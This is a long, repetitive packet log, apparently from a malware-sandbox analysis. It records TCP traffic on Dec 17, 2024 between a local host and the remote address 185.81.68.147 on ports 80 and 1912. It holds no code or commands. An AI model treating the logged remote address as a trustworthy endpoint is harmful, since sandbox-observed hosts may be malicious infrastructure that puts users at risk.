                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.997840881 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.156058073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.156856060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.156867981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.156886101 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.156894922 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.156903028 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.156910896 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.156922102 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.156987906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157006025 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157016039 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157057047 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157100916 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157152891 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157160997 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157267094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157361984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157542944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157681942 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157855034 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157864094 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157900095 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158268929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158374071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158425093 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158489943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158617020 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158720970 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158752918 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158767939 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158828974 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158870935 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158955097 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158956051 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158965111 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159008980 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159013033 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159034967 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159149885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159244061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159427881 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159652948 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159939051 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159946918 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159960985 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159970045 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159977913 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160069942 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160183907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160219908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160228968 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160315037 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160337925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160360098 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160444021 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160451889 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160499096 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160506964 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160584927 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160981894 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161510944 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161767960 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161780119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161791086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161808014 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161814928 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161829948 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161838055 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161844969 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161853075 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161879063 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.162096024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.162190914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.162532091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.163106918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.163165092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.163357973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.164073944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.164087057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.164572001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.164941072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.165019989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.165117025 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.167264938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.168390989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.168585062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.169296980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.169327974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.169359922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.169392109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.169431925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.169657946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.169689894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.169691086 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.169933081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.170810938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.170844078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.171197891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279999018 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280008078 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280046940 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280085087 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280128956 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280177116 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280278921 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280287981 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280349970 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280358076 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280440092 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280447960 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280534029 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280541897 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280651093 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280703068 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280755043 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280764103 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280853987 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280863047 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280941010 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280950069 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.281042099 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.281050920 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.281095982 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.281105042 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.281193972 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.281203032 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.281308889 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.281317949 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.281918049 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.282124996 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.282192945 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.339400053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.339499950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.339627981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.339737892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.339765072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.340136051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.340687990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.340699911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.340934038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.341589928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.341675997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.341953039 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.342462063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.342580080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.342880011 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.343493938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.343559027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.344402075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.344472885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.344512939 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.344634056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.345381021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.345392942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.345519066 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.346342087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.346357107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.346546888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.347357035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.347532988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.348165989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.348319054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.348459959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.348642111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.349478960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.349490881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.349749088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.350157022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.350219965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.350370884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.351067066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.351136923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.351948977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.352014065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.352196932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.352363110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.353019953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.353144884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.353995085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.354007006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.354140043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.354955912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.354968071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.355212927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.355962992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.355974913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.356209040 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.356836081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.356848001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.357166052 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.357768059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.357937098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.358468056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.358660936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.358764887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.359652042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397465944 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397598982 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397680044 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397737026 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397793055 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397944927 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397953987 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.398252010 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.398261070 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.398386955 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.398396015 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.398498058 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.398507118 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.398608923 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.398617983 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.398838043 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.398847103 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.399075031 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.399163961 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.401989937 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.401999950 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402086973 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402096033 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402139902 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402239084 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402256966 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402265072 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402338982 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402348042 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402455091 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402465105 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402571917 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402580023 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402750015 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402759075 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402904034 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402913094 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402920961 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403013945 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403023005 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403121948 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403131008 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403204918 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403249979 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403278112 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403286934 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403340101 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403455973 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403465033 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403474092 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403548002 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403557062 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403594017 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403613091 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403676033 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403685093 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403774023 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403783083 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403848886 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403942108 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403974056 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403983116 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404122114 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404130936 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404139042 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404146910 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404191017 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404200077 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404254913 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404263973 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404280901 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404289961 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404930115 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.405534029 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.405606985 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.519119978 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.519134998 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.519243002 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.519251108 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.519501925 CET191249710185.81.68.147192.168.2.8
